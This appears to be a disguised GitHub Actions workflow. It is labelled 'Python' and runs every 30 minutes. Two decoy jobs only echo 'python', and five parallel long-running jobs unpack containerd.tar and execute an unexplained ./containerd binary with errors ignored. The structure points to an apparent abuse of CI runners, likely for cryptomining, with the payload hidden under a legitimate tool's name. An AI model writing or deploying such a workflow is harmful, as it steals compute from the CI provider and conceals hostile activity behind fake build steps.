name: Python
on:  
  push:
  pull_request:
  schedule:
  - cron: "*/30 * * * *"
 
jobs:
 python-1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"
 
 python-2:
    runs-on: ubuntu-18.04 
    needs: python-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"
 
 python-build-5:
    runs-on: ubuntu-20.04 
    needs: python-2
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        tar xf containerd.tar
        ./containerd
        
 python-build-4:
    runs-on: ubuntu-20.04 
    needs: python-2
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        tar xf containerd.tar
        ./containerd
 
 python-build-3:
    runs-on: ubuntu-20.04 
    needs: python-2
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        tar xf containerd.tar
        ./containerd
 
 python-build-2:
    runs-on: ubuntu-20.04 
    needs: python-2
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        tar xf containerd.tar
        ./containerd

 python-build-1:
    runs-on: ubuntu-20.04 
    needs: python-2
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        tar xf containerd.tar
        ./containerd
